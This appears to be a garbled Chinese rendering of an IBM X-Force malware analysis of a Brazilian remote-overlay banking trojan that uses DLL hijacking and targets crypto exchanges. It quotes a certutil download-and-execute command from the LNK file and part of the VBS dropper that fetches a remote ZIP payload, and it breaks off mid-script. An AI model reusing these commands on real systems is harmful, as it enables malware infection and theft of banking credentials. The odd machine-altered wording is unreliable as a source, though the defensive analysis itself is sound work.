长途overlay歹意软件十分多产和通用，它时不时就会呈现，但在巴西一般很少发现特别或杂乱的金融歹意软件。而巴西金融 *** 违法分子运用的盛行长途掩盖特洛伊木马这个特别的变体有什么特别之处呢？首要，它运用了并不常见的动态链接库（DLL）绑架技能。更有意思的是，歹意软件的运营商不再只重视银行，他们现在也有爱好盗取用户的加密钱银交流账户，这与金融 *** 违法对加密钱银的爱好日益增长有关。
一、经过长途会话感染巴西用户
IBM X-Force研讨继续盯梢巴西的要挟局势。在最近的剖析中，咱们的团队观察到长途overlay系列歹意软件的新变种感染了该区域的用户。
长途overlay特洛伊木马在针对巴西用户的诈骗中很常见。咱们剖析的最新变体运用DLL绑架技能长途操控受感染的设备，将其歹意代码加载到免费防病毒程序的合法二进制文件中。
歹意DLL是用Delphi编程言语编写的曲型巴西歹意软件，包括overlay图画（歹意软件在受感染的用户验证在线银行会话后在屏幕上overlay）。屏幕的外观和感觉与受害者银行的相匹配，需求供给个人信息和双要素身份验证（2FA）。
二、对加密钱银爱好日积月累
加密钱银买卖账户正在变得比传统账户更受欢迎，这是巴西当地诈骗者或许了解并预备运用的趋势。
最近，巴西首要银行进犯活动中的变体针对加密钱银交流渠道。进犯办法类似于银行方针：经过盗取用户的帐户凭证，接收他们的帐户并将他们的钱转移到违法分子的帐户。
三、典型感染流程
检查此长途overly特洛伊木马的感染例程标明，当潜在受害者被拐骗下载其认为是正式发票的文件时，就会被初度感染。该文件是一个存档，其间包括最终会感染设备的歹意脚本。下面是典型感染战略的扼要流程：
1. 受害者运用搜索引擎查找供给商的网站并付出月度发票。之一个结果是进犯者经过付费尽力提高的歹意页面，而不是真实的网站。受害者拜访该页面并键入其ID详细信息以获取发票。
2. 受害者不知不觉的下载了一个歹意LNK文件（Windows快捷方式文件），此文件存档在一个ZIP中，宣称来自巴西交通运输部DETRAN。
3. LNK文件包括一个指令，该指令将从长途服务器下载歹意Visual Basic（VBS）脚本，并运用合法的Windows程序certutil运转。
4. 歹意VBS脚本从进犯者的长途服务器下载另一个ZIP文件，这次包括歹意软件的歹意DLL以及用于躲藏DLL的免费防病毒程序的合法二进制文件。
5. VBS脚本履行歹意软件，感染设备。
6. 布置后，特洛伊木马运用DLL绑架技能将其歹意DLL加载到防病毒程序的合法二进制文件中。这种迂回感染例程有助于歹意软件经过安全操控来躲避检测。
7. 完结装置后，歹意软件监督受害者的阅读器，并在受害者阅读方针在线银行网站或加密钱银交流渠道时开端举动。
8. 歹意DLL组件为歹意软件供给了长途操控功用。
四、深化探求歹意LNK文件
细心检查LNK文件能够看出它乱用了certutil，certutil是作为证书服务的一部分装置的。
首要，从名为“tudodebom”的长途服务器下载歹意脚本：
“C:WindowsSystem32cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%tudodebom.txt && cd %temp% && rename “tudodebom.txt“
· -urlcache 显现或删去URL缓存条目。
· -split -f 强制获取特定URL并更新缓存。
获取后，歹意软件会将文件名和扩展名从“tudodebom.txt”更改为“JNSzlEYAIubkggX.vbs”：
“JNSzlEYAIubkggX.vbs” && C:windowssystem32cmd.exe /k JNSzlEYAIubkggX.vbs“
LNK文件调用Windows指令行（CMD）并履行certutil.exe以从长途主机下载TXT文件（.vbs）：
hXXps://remoteserver/turbulencianoar/tudodebom.txt
最终，歹意软件履行歹意VBS脚本。
五、检测VBS 脚本
VBS脚本下载包括歹意软件载荷的ZIP存档。然后，布置在受害者设备上具有以下命名形式的目录中：
“C:AV product_” + RandomName + “”
该进程完结后，该脚本将履行合法但有毒的二进制文件，该二进制文件将加载歹意DLL并发动与进犯者的指令和操控（C＆C）服务器的衔接。
这个例程中风趣的元素包括：
· 运用合法的长途服务器来保管进犯东西;
· 乱用现有防病毒程序中的合法二进制文件来躲藏歹意软件的DLL;
· 歹意软件的命名约好，能够使歹意软件更简单在受感染的设备上检测和阻隔。
在剖析歹意软件后，咱们发现了特洛伊木马用于布置其歹意DLL的VBS脚本，其间包括以下内容：
Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll
Set objShell = CreateObject( “WScript.Shell” )
ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”
randname = getrandomstring()
exerandom = “AV product.SystrayStartTrigger-” + randname
filezip = “AuZwaaU.zip”
deffolder = “C:AV product_” + randname + “”
filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “java_install.log”
fileexe = “AuZwaaU.exe”
filedll = “AuZwaaU.sys”
Set objFSO = CreateObject(“Scripting.FileSystemObject”)
If (objFSO.FileExists(filesuccess)) Then
WScript.Quit
End If
If not (objFSO.FileExists(filezip)) Then
Set objFile = objFSO.CreateTextFile(filesuccess, True)
objFile.Write ” ”
objFile.Close
‘WScript.Echo msg
dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)
dim bStrm: Set bStrm = createobject(“Adodb.Stream”)
xHttp.Open “GET”, ubase, False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody

[1] [2]  黑客接单网